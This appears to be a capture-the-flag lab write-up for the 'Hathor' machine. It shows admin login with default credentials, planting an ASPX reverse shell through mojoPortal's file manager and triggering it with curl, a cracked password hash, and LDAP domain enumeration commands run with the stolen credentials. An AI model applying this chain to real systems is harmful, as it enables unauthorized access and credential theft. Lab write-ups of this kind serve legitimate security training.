# Enum Web Page

`http://10.10.11.147/`

![1](img/1.png)

`http://10.10.11.147/robots.txt`

![2](img/2.png)

`http://hathor.windcorp.htb/Secure/Login.aspx?returnurl=%2f`

![3](img/3.png)

# Admin creds

`Enter "admin@admin.com" for Email, "admin" for LoginName, and "admin" for Password. `

![4](img/4.png)

# Modify Mojo files

Go to file manager and edit fragment1.htm with reverse shell aspx.

`http://10.129.141.142/Admin/PageManager.aspx`

![5](img/5.png)

Copy file to logos folder and modify extension.

![6](img/6.png)

You cannot see your file but it's there.

![7](img/7.png)

`curl http://10.129.141.142/Data/Sites/1/media/logos/doom.aspx`

![8](img/8.png)

# Password Spray

`type C:\Get-bADpasswords\Accessible\CSVs\exported_windcorp-03102021-173510.csv`

![9](img/9.png)

Crack password.

![10](img/10.png)

```
9cb01504ba0247ad5c6e08f7ccae7903 : !!!!ilovegood17
```

Get user list.

`get-aduser -filter * | select SamAccountName, SID`

![11](img/11.png)


`ldapsearch -H ldap://10.129.141.142 -x -D 'windcorp\BeatriceMill' -w '!!!!ilovegood17' -b 'CN=Users,DC=windcorp,DC=htb'`

![12](img/12.png)

`ldapdomaindump ldap://10.129.141.142 -u 'windcorp\BeatriceMill' -p '!!!!ilovegood17' -n 10.129.141.142 -at SIMPLE --no-html --no-grep`



# References
https://www.mojoportal.com/Forums/Thread.aspx?pageid=5&t=2902~-1 \
https://raw.githubusercontent.com/borjmz/aspx-reverse-shell/master/shell.aspx \
https://shellizm.com/aspx-shell/ \
https://crackstation.net/ \
https://docs.microsoft.com/en-US/troubleshoot/developer/webapps/aspnet/development/implement-impersonation